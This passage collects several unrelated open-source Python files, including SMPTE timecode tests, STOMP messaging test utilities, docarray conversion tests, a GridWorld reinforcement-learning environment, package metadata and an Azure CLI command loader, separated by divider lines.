time_code = SmpteTimeCode.from_frames(1801, FPS_29_97)
self.assertEqual("00:01:00;03", str(time_code))
self.assertAlmostEqual(60.093, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1802, FPS_29_97)
self.assertEqual("00:01:00;04", str(time_code))
self.assertAlmostEqual(60.126, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1803, FPS_29_97)
self.assertEqual("00:01:00;05", str(time_code))
self.assertAlmostEqual(60.160, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1804, FPS_29_97)
self.assertEqual("00:01:00;06", str(time_code))
self.assertAlmostEqual(60.193, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(1805, FPS_29_97)
self.assertEqual("00:01:00;07", str(time_code))
self.assertAlmostEqual(60.226, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17977, FPS_29_97)
self.assertEqual("00:09:59;25", str(time_code))
self.assertAlmostEqual(599.832, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17978, FPS_29_97)
self.assertEqual("00:09:59;26", str(time_code))
self.assertAlmostEqual(599.865, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17979, FPS_29_97)
self.assertEqual("00:09:59;27", str(time_code))
self.assertAlmostEqual(599.899, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17980, FPS_29_97)
self.assertEqual("00:09:59;28", str(time_code))
self.assertAlmostEqual(599.932, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17981, FPS_29_97)
self.assertEqual("00:09:59;29", str(time_code))
self.assertAlmostEqual(599.966, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17982, FPS_29_97)
self.assertEqual("00:10:00;00", str(time_code))
self.assertAlmostEqual(599.999, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17983, FPS_29_97)
self.assertEqual("00:10:00;01", str(time_code))
self.assertAlmostEqual(600.032, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17984, FPS_29_97)
self.assertEqual("00:10:00;02", str(time_code))
self.assertAlmostEqual(600.066, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17985, FPS_29_97)
self.assertEqual("00:10:00;03", str(time_code))
self.assertAlmostEqual(600.099, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17986, FPS_29_97)
self.assertEqual("00:10:00;04", str(time_code))
self.assertAlmostEqual(600.132, time_code.to_seconds(), delta=0.001)
time_code = SmpteTimeCode.from_frames(17987, FPS_29_97)
self.assertEqual("00:10:00;05", str(time_code))
self.assertAlmostEqual(600.166, time_code.to_seconds(), delta=0.001)
def test_from_frames(self):
time_code = SmpteTimeCode.from_frames(111694, FPS_30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111694, time_code.to_frames())
self.assertEqual("01:02:03:04", str(time_code))
time_code = SmpteTimeCode.from_frames(111582, FPS_29_97)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(3, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(111582, time_code.to_frames())
self.assertEqual("01:02:03;04", str(time_code))
def test_add_frames(self):
time_code = SmpteTimeCode.parse("01:02:03:04", FPS_30)
time_code.add_frames(30)
self.assertEqual(1, time_code.get_hours())
self.assertEqual(2, time_code.get_minutes())
self.assertEqual(4, time_code.get_seconds())
self.assertEqual(4, time_code.get_frames())
self.assertEqual(FPS_30, time_code.get_frame_rate())
self.assertFalse(time_code.is_drop_frame())
self.assertEqual(111724, time_code.to_frames())
self.assertEqual(Fraction(111724, 30), time_code.to_temporal_offset())
self.assertEqual("01:02:04:04", str(time_code))
time_code = SmpteTimeCode.parse("00:00:59;29", FPS_29_97)
time_code.add_frames()
self.assertEqual(0, time_code.get_hours())
self.assertEqual(1, time_code.get_minutes())
self.assertEqual(0, time_code.get_seconds())
self.assertEqual(2, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(1_800, time_code.to_frames())
self.assertEqual(Fraction(1800, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("00:01:00;02", str(time_code))
time_code = SmpteTimeCode.parse("00:19:59;29", FPS_29_97)
time_code.add_frames()
self.assertEqual(0, time_code.get_hours())
self.assertEqual(20, time_code.get_minutes())
self.assertEqual(0, time_code.get_seconds())
self.assertEqual(0, time_code.get_frames())
self.assertEqual(FPS_29_97, time_code.get_frame_rate())
self.assertTrue(time_code.is_drop_frame())
self.assertEqual(35_964, time_code.to_frames())
self.assertEqual(Fraction(35964, Fraction(30000, 1001)), time_code.to_temporal_offset())
self.assertEqual("00:20:00;00", str(time_code))
if __name__ == '__main__':
unittest.main()
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from pychron.hardware.lakeshore.base_controller import BaseLakeShoreController
class Model331TemperatureController(BaseLakeShoreController):
pass
# ============= EOF =============================================
|
try:
from configparser import RawConfigParser
except ImportError:
from ConfigParser import RawConfigParser
import logging
import os
import re
import socket
import sys
import threading
from stomp.backward import *
log = logging.getLogger('testutils.py')
config = RawConfigParser()
config.read(os.path.join(os.path.dirname(__file__), 'setup.ini'))
header_re = re.compile(r'[^:]+:.*')
if sys.hexversion >= 0x03000000: # Python 3+
from stomp.test.p3testutils import *
else: # Python 2
from stomp.test.p2testutils import *
def get_environ(name):
try:
return os.environ[name]
except:
return None
def get_default_host():
host = config.get('default', 'host')
port = config.get('default', 'port')
return [(get_environ('STD_HOST') or host, int(get_environ('STD_PORT') or port))]
def get_default_vhost():
try:
vhost = config.get('default', 'vhost')
except:
vhost = None
return get_environ('STD_VHOST') or vhost
def get_default_user():
user = config.get('default', 'user')
return get_environ('STD_USER') or user
def get_default_password():
password = config.get('default', 'password')
return get_environ('STD_PASSWORD') or password
def get_ipv6_host():
host = config.get('ipv6', 'host')
port = config.get('ipv6', 'port')
return [(get_environ('IPV6_HOST') or host, int(get_environ('IPV6_PORT') or port))]
def get_default_ssl_host():
host = config.get('default', 'host')
port = config.get('default', 'ssl_port')
return [(get_environ('STD_HOST') or host, int(get_environ('STD_SSL_PORT') or port))]
def get_sni_ssl_host():
host = config.get('sni', 'host')
port = config.get('sni', 'ssl_port')
return [(get_environ('SNI_HOST') or host, int(get_environ('SNI_SSL_PORT') or port))]
def get_rabbitmq_host():
host = config.get('rabbitmq', 'host')
port = config.get('rabbitmq', 'port')
return [(get_environ('RABBITMQ_HOST') or host, int(get_environ('RABBITMQ_PORT') or port))]
def get_rabbitmq_user():
user = config.get('rabbitmq', 'user')
return get_environ('RABBITMQ_USER') or user
def get_rabbitmq_password():
password = config.get('rabbitmq', 'password')
return get_environ('RABBITMQ_PASSWORD') or password
def get_stompserver_host():
host = config.get('stompserver', 'host')
port = config.get('stompserver', 'port')
return [(get_environ('STOMPSERVER_HOST') or host, int(get_environ('STOMPSERVER_PORT') or port))]
def get_apollo_host():
host = config.get('apollo', 'host')
port = config.get('apollo', 'port')
return [(get_environ('APOLLO_HOST') or host, int(get_environ('APOLLO_PORT') or port))]
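# Illustrative only: the lookup helpers above assume setup.ini provides the
# sections and keys sketched here. All host/port/credential values below are
# placeholders, not the project's actual test configuration; 'vhost' under
# [default] is optional (get_default_vhost falls back to None).
def make_example_config():
    cfg = RawConfigParser()
    cfg.add_section('default')
    for key, value in [('host', '127.0.0.1'), ('port', '61613'),
                       ('ssl_port', '61612'), ('user', 'admin'),
                       ('password', 'password')]:
        cfg.set('default', key, value)
    for section in ('ipv6', 'rabbitmq', 'stompserver', 'apollo'):
        cfg.add_section(section)
        cfg.set(section, 'host', '127.0.0.1')
        cfg.set(section, 'port', '61613')
    cfg.set('rabbitmq', 'user', 'guest')
    cfg.set('rabbitmq', 'password', 'guest')
    cfg.add_section('sni')
    cfg.set('sni', 'host', '127.0.0.1')
    cfg.set('sni', 'ssl_port', '61612')
    return cfg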
class TestStompServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.frames = []
def start(self):
log.debug('Starting stomp server')
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind((self.host, self.port))
self.s.listen(1)
self.running = True
thread = threading.Thread(None, self.run)
thread.daemon = True
thread.start()
self.stopped = False
log.debug('Stomp server started')
def stop(self):
log.debug('Stopping test server')
if self.conn:
try:
self.conn.shutdown(socket.SHUT_WR)
except Exception:
pass
self.conn.close()
if self.s:
self.s.close()
self.running = False
self.conn = None
self.s = None
self.stopped = True
log.debug('Connection stopped')
def get_next_frame(self):
if len(self.frames) > 0:
rtn = self.frames[0]
del self.frames[0]
return rtn
else:
return ''
def add_frame(self, frame):
self.frames.append(frame)
def run(self):
self.conn, _ = self.s.accept()
while self.running:
try:
_ = self.conn.recv(1024)
frame = self.get_next_frame()
if self.conn is None:
break
if frame is not None:
self.conn.send(encode(frame))
except Exception:
_, e, _ = sys.exc_info()
log.debug(e)
break
try:
self.conn.close()
except:
pass
self.stopped = True
log.debug('Run loop completed')
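# Hedged usage sketch for TestStompServer: port 60001 and the canned CONNECTED
# frame are arbitrary choices for illustration, not values used by the real
# tests (which drive the server through stomp clients). It shows the intended
# add_frame/start/stop lifecycle with a bare socket standing in for a client.
def example_stomp_server_roundtrip():
    server = TestStompServer('127.0.0.1', 60001)
    server.add_frame('CONNECTED\nversion:1.1\n\n\x00')
    server.start()
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(('127.0.0.1', 60001))
    client.sendall(b'CONNECT\naccept-version:1.1\n\n\x00')
    reply = client.recv(1024)
    client.close()
    server.stop()
    return reply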
class TestStdin(object):
pass
class TestStdout(object):
def __init__(self, test):
self.test = test
self.expects = []
def expect(self, txt):
self.expects.insert(0, re.compile(txt))
def write(self, txt):
txt = txt.rstrip()
if txt != '':
print(txt)
if txt == '>' or txt == '' or header_re.match(txt):
return
if len(self.expects) == 0:
self.test.fail('No expectations - actual "%s"' % txt)
return
for x in range(0, len(self.expects)):
chk = self.expects[x]
if chk.match(txt):
del self.expects[x]
return
self.test.fail('"%s" was not expected' % txt)
def flush(self):
pass
|
import os
import numpy as np
import pytest
from docarray import Document
from docarray.document.generators import from_files
from docarray.helper import __windows__
cur_dir = os.path.dirname(os.path.abspath(__file__))
def test_video_convert_pipe(pytestconfig, tmpdir):
num_d = 0
fname = str(tmpdir / f'tmp{num_d}.mp4')
d = Document(uri=os.path.join(cur_dir, 'toydata/mov_bbb.mp4'))
d.load_uri_to_video_tensor()
d.save_video_tensor_to_file(fname)
assert os.path.exists(fname)
def test_audio_convert_pipe(pytestconfig, tmpdir):
num_d = 0
for d in from_files(f'{cur_dir}/toydata/*.wav'):
fname = str(tmpdir / f'tmp{num_d}.wav')
d.load_uri_to_audio_tensor()
d.tensor = d.tensor[::-1]
d.save_audio_tensor_to_file(fname)
assert os.path.exists(fname)
num_d += 1
assert num_d
def test_image_convert_pipe(pytestconfig):
for d in from_files(f'{pytestconfig.rootdir}/.github/**/*.png'):
(
d.load_uri_to_image_tensor()
.convert_uri_to_datauri()
.set_image_tensor_shape((64, 64))
.set_image_tensor_normalization()
.set_image_tensor_channel_axis(-1, 0)
)
assert d.tensor.shape == (3, 64, 64)
assert d.uri
def test_uri_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.load_uri_to_image_tensor()
assert isinstance(doc.tensor, np.ndarray)
assert doc.tensor.shape == (85, 152, 3) # h,w,c
assert doc.mime_type == 'image/png'
def test_datauri_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.convert_uri_to_datauri()
assert not doc.tensor
assert doc.mime_type == 'image/png'
def test_blob_to_tensor():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.png'))
doc.load_uri_to_blob()
doc.convert_blob_to_image_tensor()
assert isinstance(doc.tensor, np.ndarray)
assert doc.mime_type == 'image/png'
assert doc.tensor.shape == (85, 152, 3) # h,w,c
def test_convert_blob_to_tensor():
rand_state = np.random.RandomState(0)
array = rand_state.random([10, 10])
doc = Document(content=array.tobytes())
assert doc.content_type == 'blob'
initialized_blob = doc.blob
doc.convert_blob_to_tensor()
assert doc.content_type == 'tensor'
converted_blob_in_one_of = doc.blob
assert initialized_blob != converted_blob_in_one_of
np.testing.assert_almost_equal(doc.content.reshape([10, 10]), array)
@pytest.mark.parametrize('shape, channel_axis', [((3, 32, 32), 0), ((32, 32, 3), -1)])
def test_image_normalize(shape, channel_axis):
doc = Document(content=np.random.randint(0, 255, shape, dtype=np.uint8))
doc.set_image_tensor_normalization(channel_axis=channel_axis)
assert doc.tensor.ndim == 3
assert doc.tensor.shape == shape
assert doc.tensor.dtype == np.float32
@pytest.mark.parametrize(
'arr_size, channel_axis, height, width',
[
([32, 28, 3], -1, 32, 28), # h, w, c (rgb)
([3, 32, 28], 0, 32, 28), # c, h, w (rgb)
([1, 32, 28], 0, 32, 28), # c, h, w, (greyscale)
([32, 28, 1], -1, 32, 28), # h, w, c, (greyscale)
],
)
def test_convert_image_tensor_to_uri(arr_size, channel_axis, width, height):
doc = Document(content=np.random.randint(0, 255, arr_size))
assert doc.tensor.any()
assert not doc.uri
doc.set_image_tensor_shape(channel_axis=channel_axis, shape=(width, height))
doc.convert_image_tensor_to_uri(channel_axis=channel_axis)
assert doc.uri.startswith('data:image/png;base64,')
assert doc.mime_type == 'image/png'
assert doc.tensor.any() # assure after conversion tensor still exist.
@pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
)
@pytest.mark.parametrize(
'uri, mimetype',
[
(__file__, 'text/x-python'),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_blob(uri, mimetype):
d = Document(uri=uri)
assert not d.blob
d.load_uri_to_blob()
assert d.blob
assert d.mime_type == mimetype
@pytest.mark.parametrize(
'converter', ['convert_blob_to_datauri', 'convert_content_to_datauri']
)
def test_convert_blob_to_uri(converter):
d = Document(content=open(__file__).read().encode(), mime_type='text/x-python')
assert d.blob
getattr(d, converter)()
assert d.uri.startswith('data:text/x-python;')
@pytest.mark.parametrize(
'converter', ['convert_text_to_datauri', 'convert_content_to_datauri']
)
def test_convert_text_to_uri(converter):
d = Document(content=open(__file__).read())
assert d.text
getattr(d, converter)()
assert d.uri.startswith('data:text/plain;')
@pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
)
@pytest.mark.parametrize(
'uri, mimetype',
[
pytest.param(
__file__,
'text/x-python',
marks=pytest.mark.xfail(
condition=__windows__, reason='x-python is not detected on windows CI'
),
),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_text(uri, mimetype):
doc = Document(uri=uri, mime_type=mimetype)
doc.load_uri_to_text()
if mimetype == 'text/html':
assert '<!doctype html>' in doc.text
elif mimetype == 'text/x-python':
text_from_file = open(__file__).read()
assert doc.text == text_from_file
def test_convert_text_to_uri_and_back():
text_from_file = open(__file__).read()
doc = Document(content=text_from_file, mime_type='text/x-python')
assert doc.text
assert doc.mime_type == 'text/x-python'
doc.convert_text_to_datauri()
doc.load_uri_to_text()
assert doc.mime_type == 'text/plain'
assert doc.text == text_from_file
def test_convert_text_diff_encoding(tmpfile):
otext = 'testä'
text = otext.encode('iso8859')
with open(tmpfile, 'wb') as fp:
fp.write(text)
with pytest.raises(UnicodeDecodeError):
d = Document(uri=str(tmpfile)).load_uri_to_text()
d = Document(uri=str(tmpfile)).load_uri_to_text(charset='iso8859')
assert d.text == otext
with open(tmpfile, 'w', encoding='iso8859') as fp:
fp.write(otext)
with pytest.raises(UnicodeDecodeError):
d = Document(uri=str(tmpfile)).load_uri_to_text()
d = Document(uri=str(tmpfile)).load_uri_to_text(charset='iso8859')
assert d.text == otext
def test_convert_content_to_uri():
d = Document(content=np.random.random([10, 10]))
with pytest.raises(NotImplementedError):
d.convert_content_to_datauri()
@pytest.mark.parametrize(
'uri, mimetype',
[
(__file__, 'text/x-python'),
('http://google.com/index.html', 'text/html'),
('https://google.com/index.html', 'text/html'),
],
)
def test_convert_uri_to_data_uri(uri, mimetype):
doc = Document(uri=uri, mime_type=mimetype)
doc.convert_uri_to_datauri()
assert doc.uri.startswith(f'data:{mimetype}')
assert doc.mime_type == mimetype
def test_glb_converters():
doc = Document(uri=os.path.join(cur_dir, 'toydata/test.glb'))
doc.load_uri_to_point_cloud_tensor(2000)
assert doc.tensor.shape == (2000, 3)
doc.load_uri_to_point_cloud_tensor(2000, as_chunks=True)
assert len(doc.chunks) == 1
assert doc.chunks[0].tensor.shape == (2000, 3)
|
''' GridWorldMDPClass.py: Contains the GridWorldMDP class. '''
# Python imports.
from __future__ import print_function
import copy
import random
import sys
import os
import numpy as np
# Other imports.
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.grid_world.GridWorldStateClass import GridWorldState
# Fix input to cooperate with python 2 and 3.
try:
input = raw_input
except NameError:
pass
class GridWorldMDP(MDP):
''' Class for a Grid World MDP '''
# Static constants.
ACTIONS = ["up", "down", "left", "right"]
def __init__(self,
width=5,
height=3,
init_loc=(1,1),
rand_init=False,
goal_locs=[(5,3)],
lava_locs=[()],
walls=[],
is_goal_terminal=True,
gamma=0.99,
init_state=None,
slip_prob=0.0,
step_cost=0.0,
lava_cost=0.01,
name="gridworld"):
'''
Args:
height (int)
width (int)
init_loc (tuple: (int, int))
goal_locs (list of tuples: [(int, int)...])
lava_locs (list of tuples: [(int, int)...]): These locations return -1 reward.
'''
# Setup init location.
self.rand_init = rand_init
if rand_init:
init_loc = random.randint(1, width), random.randint(1, height)
while init_loc in walls:
init_loc = random.randint(1, width), random.randint(1, height)
self.init_loc = init_loc
init_state = GridWorldState(init_loc[0], init_loc[1]) if init_state is None or rand_init else init_state
MDP.__init__(self, GridWorldMDP.ACTIONS, self._transition_func, self._reward_func, init_state=init_state, gamma=gamma)
if type(goal_locs) is not list:
raise ValueError("(simple_rl) GridWorld Error: argument @goal_locs needs to be a list of locations. For example: [(3,3), (4,3)].")
self.step_cost = step_cost
self.lava_cost = lava_cost
self.walls = walls
self.width = width
self.height = height
self.goal_locs = goal_locs
self.cur_state = GridWorldState(init_loc[0], init_loc[1])
self.is_goal_terminal = is_goal_terminal
self.slip_prob = slip_prob
self.name = name
self.lava_locs = lava_locs
def set_slip_prob(self, slip_prob):
self.slip_prob = slip_prob
def get_slip_prob(self):
return self.slip_prob
def is_goal_state(self, state):
return (state.x, state.y) in self.goal_locs
def _reward_func(self, state, action):
'''
Args:
state (State)
action (str)
Returns
(float)
'''
if self._is_goal_state_action(state, action):
return 1.0 - self.step_cost
elif (int(state.x), int(state.y)) in self.lava_locs:
return -self.lava_cost
else:
return 0 - self.step_cost
def _is_goal_state_action(self, state, action):
'''
Args:
state (State)
action (str)
Returns:
(bool): True iff the state-action pair send the agent to the goal state.
'''
if (state.x, state.y) in self.goal_locs and self.is_goal_terminal:
# Already at terminal.
return False
if action == "left" and (state.x - 1, state.y) in self.goal_locs:
return True
elif action == "right" and (state.x + 1, state.y) in self.goal_locs:
return True
elif action == "down" and (state.x, state.y - 1) in self.goal_locs:
return True
elif action == "up" and (state.x, state.y + 1) in self.goal_locs:
return True
else:
return False
def _transition_func(self, state, action):
'''
Args:
state (State)
action (str)
Returns
(State)
'''
if state.is_terminal():
return state
r = random.random()
if self.slip_prob > r:
# Flip dir.
if action == "up":
action = random.choice(["left", "right"])
elif action == "down":
action = random.choice(["left", "right"])
elif action == "left":
action = random.choice(["up", "down"])
elif action == "right":
action = random.choice(["up", "down"])
if action == "up" and state.y < self.height and not self.is_wall(state.x, state.y + 1):
next_state = GridWorldState(state.x, state.y + 1)
elif action == "down" and state.y > 1 and not self.is_wall(state.x, state.y - 1):
next_state = GridWorldState(state.x, state.y - 1)
elif action == "right" and state.x < self.width and not self.is_wall(state.x + 1, state.y):
next_state = GridWorldState(state.x + 1, state.y)
elif action == "left" and state.x > 1 and not self.is_wall(state.x - 1, state.y):
next_state = GridWorldState(state.x - 1, state.y)
else:
next_state = GridWorldState(state.x, state.y)
if (next_state.x, next_state.y) in self.goal_locs and self.is_goal_terminal:
next_state.set_terminal(True)
return next_state
def is_wall(self, x, y):
'''
Args:
x (int)
y (int)
Returns:
(bool): True iff (x,y) is a wall location.
'''
return (x, y) in self.walls
def __str__(self):
return self.name + "_h-" + str(self.height) + "_w-" + str(self.width)
def __repr__(self):
return self.__str__()
def get_goal_locs(self):
return self.goal_locs
def get_lava_locs(self):
return self.lava_locs
def visualize_policy(self, policy):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
action_char_dict = {
"up":"^", #u"\u2191",
"down":"v", #u"\u2193",
"left":"<", #u"\u2190",
"right":">", #u"\u2192"
}
mdpv.visualize_policy(self, policy, _draw_state, action_char_dict)
input("Press anything to quit")
def visualize_agent(self, agent):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_agent(self, agent, _draw_state)
input("Press anything to quit")
def visualize_value(self):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_value(self, _draw_state)
input("Press anything to quit")
def visualize_learning(self, agent, delay=0.0):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_learning(self, agent, _draw_state, delay=delay)
input("Press anything to quit")
def visualize_interaction(self):
from simple_rl.utils import mdp_visualizer as mdpv
from simple_rl.tasks.grid_world.grid_visualizer import _draw_state
mdpv.visualize_interaction(self, _draw_state)
input("Press anything to quit")
def _error_check(state, action):
'''
Args:
state (State)
action (str)
Summary:
Checks to make sure the received state and action are of the right type.
'''
if action not in GridWorldMDP.ACTIONS:
raise ValueError("(simple_rl) GridWorldError: the action provided (" + str(action) + ") was invalid in state: " + str(state) + ".")
if not isinstance(state, GridWorldState):
raise ValueError("(simple_rl) GridWorldError: the given state (" + str(state) + ") was not of the correct class.")
def make_grid_world_from_file(file_name, randomize=False, num_goals=1, name=None, goal_num=None, slip_prob=0.0):
'''
Args:
file_name (str)
randomize (bool): If true, chooses a random agent location and goal location.
num_goals (int)
name (str)
Returns:
(GridWorldMDP)
Summary:
Builds a GridWorldMDP from a file:
'w' --> wall
'a' --> agent
'g' --> goal
'-' --> empty
'''
if name is None:
name = file_name.split(".")[0]
# grid_path = os.path.dirname(os.path.realpath(__file__))
wall_file = open(os.path.join(os.getcwd(), file_name))
wall_lines = wall_file.readlines()
# Get walls, agent, goal loc.
num_rows = len(wall_lines)
num_cols = len(wall_lines[0].strip())
empty_cells = []
agent_x, agent_y = 1, 1
walls = []
goal_locs = []
lava_locs = []
for i, line in enumerate(wall_lines):
line = line.strip()
for j, ch in enumerate(line):
if ch == "w":
walls.append((j + 1, num_rows - i))
elif ch == "g":
goal_locs.append((j + 1, num_rows - i))
elif ch == "l":
lava_locs.append((j + 1, num_rows - i))
elif ch == "a":
agent_x, agent_y = j + 1, num_rows - i
elif ch == "-":
empty_cells.append((j + 1, num_rows - i))
if goal_num is not None:
goal_locs = [goal_locs[goal_num % len(goal_locs)]]
if randomize:
agent_x, agent_y = random.choice(empty_cells)
if len(goal_locs) == 0:
# Sample @num_goals random goal locations.
goal_locs = random.sample(empty_cells, num_goals)
else:
goal_locs = random.sample(goal_locs, num_goals)
if len(goal_locs) == 0:
goal_locs = [(num_cols, num_rows)]
return GridWorldMDP(width=num_cols, height=num_rows, init_loc=(agent_x, agent_y), goal_locs=goal_locs, lava_locs=lava_locs, walls=walls, name=name, slip_prob=slip_prob)
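# Illustrative sketch (the file name and layout are made up for the example):
# a minimal grid in the 'w'/'a'/'g'/'-' format documented above, written to the
# current working directory because make_grid_world_from_file resolves paths
# against os.getcwd().
def _example_grid_from_file():
    layout = "wwwww\nwa-gw\nwwwww\n"
    with open("example_grid.txt", "w") as f:
        f.write(layout)
    return make_grid_world_from_file("example_grid.txt", name="example_grid")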
def reset(self):
if self.rand_init:
init_loc = random.randint(1, self.width), random.randint(1, self.height)
self.cur_state = GridWorldState(init_loc[0], init_loc[1])
else:
self.cur_state = copy.deepcopy(self.init_state)
def main():
grid_world = GridWorldMDP(5, 10, (1, 1), (6, 7))
grid_world.visualize_interaction()
if __name__ == "__main__":
main()
|
"""
XStatic resource package
See package 'XStatic' for documentation and basic tools.
"""
# official name, upper/lowercase allowed, no spaces
DISPLAY_NAME = 'bootswatch'
# name used for PyPi
PACKAGE_NAME = 'XStatic-%s' % DISPLAY_NAME
NAME = __name__.split('.')[-1] # package name (e.g. 'foo' or 'foo_bar')
# please use a all-lowercase valid python
# package name
VERSION = '3.3.7' # version of the packaged files, please use the upstream
# version number
BUILD = '0' # our package build number, so we can release new builds
# with fixes for xstatic stuff.
PACKAGE_VERSION = VERSION + '.' + BUILD # version used for PyPi
DESCRIPTION = "%s %s (XStatic packaging standard)" % (DISPLAY_NAME, VERSION)
PLATFORMS = 'any'
CLASSIFIERS = []
KEYWORDS = 'bootswatch xstatic'
# XStatic-* package maintainer:
MAINTAINER = 'Rob Cresswell'
MAINTAINER_EMAIL = 'robert.cresswell@outlook.com'
# this refers to the project homepage of the stuff we packaged:
HOMEPAGE = 'http://bootswatch.com'
# this refers to all files:
LICENSE = 'MIT'
from os.path import join, dirname
BASE_DIR = join(dirname(__file__), 'data')
# linux package maintainers just can point to their file locations like this:
#BASE_DIR = '/usr/share/javascript/' + NAME
# location of the Javascript file that's the entry point for this package, if
# one exists, relative to BASE_DIR
LOCATIONS = {
# CDN locations (if no public CDN exists, use an empty dict)
# if value is a string, it is a base location, just append relative
# path/filename. if value is a dict, do another lookup using the
# relative path/filename you want.
# your relative path/filenames should usually be without version
# information, because either the base dir/url is exactly for this
# version or the mapping will care for accessing this version.
}
|
# Copyright (c) 2019 Seven Bridges. See LICENSE
__version__ = "2019.11.27"
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.cli.core import AzCommandsLoader
from azext_identitydirmgt.generated._help import helps # pylint: disable=unused-import
try:
from azext_identitydirmgt.manual._help import helps # pylint: disable=reimported
except ImportError as e:
if e.name.endswith('manual._help'):
pass
else:
raise e
class IdentityDirectoryManagementCommandsLoader(AzCommandsLoader):
def __init__(self, cli_ctx=None):
from azure.cli.core.commands import CliCommandType
from azext_identitydirmgt.generated._client_factory import cf_identitydirmgt_cl
identitydirmgt_custom = CliCommandType(
operations_tmpl='azext_identitydirmgt.custom#{}',
client_factory=cf_identitydirmgt_cl)
parent = super(IdentityDirectoryManagementCommandsLoader, self)
parent.__init__(cli_ctx=cli_ctx, custom_command_type=identitydirmgt_custom)
def load_command_table(self, args):
from azext_identitydirmgt.generated.commands import load_command_table
load_command_table(self, args)
try:
from azext_identitydirmgt.manual.commands import load_command_table as load_command_table_manual
load_command_table_manual(self, args)
except ImportError as e:
if e.name.endswith('manual.commands'):
pass
else:
raise e
return self.command_table
def load_arguments(self, command):
from azext_identitydirmgt.generated._params import load_arguments
load_arguments(self, command)
try:
from azext_identitydirmgt.manual._params import load_arguments as load_arguments_manual
load_arguments_manual(self, command)
except ImportError as e:
if e.name.endswith('manual._params'):
pass
else:
raise e
COMMAND_LOADER_CLS = IdentityDirectoryManagementCommandsLoader
|
import numpy as np
import cvxpy as cp
import dccp
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from sklearn.base import BaseEstimator, ClassifierMixin, TransformerMixin
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import pairwise_distances
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.model_selection import StratifiedKFold
import time
# ##################################################
# Plot the decision boundary of a classifier
# ##################################################
def decision_boundary(self, X, y, ind=[0,1], Nh = 101, colors="black", label = None):
# Scatter plot
sc = plt.scatter(X[:,ind[0]], X[:,ind[1]], c = y.astype(int))
xlimits = plt.xlim()
ylimits = plt.ylim()
if X.shape[1]>2:
print("Dimension larger than two! Cannot show the decision boundary!")
else:
# create a mesh to plot in
x_min, x_max = xlimits[0], xlimits[1]
y_min, y_max = ylimits[0], ylimits[1]
hx = (x_max-x_min)/Nh
hy = (y_max-y_min)/Nh
xx, yy = np.meshgrid(np.arange(x_min, x_max, hx),np.arange(y_min, y_max, hy))
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
Z = np.array(self.predict(np.c_[xx.ravel(), yy.ravel()]))
Z = Z.reshape(xx.shape)
# Put the result into a color plot
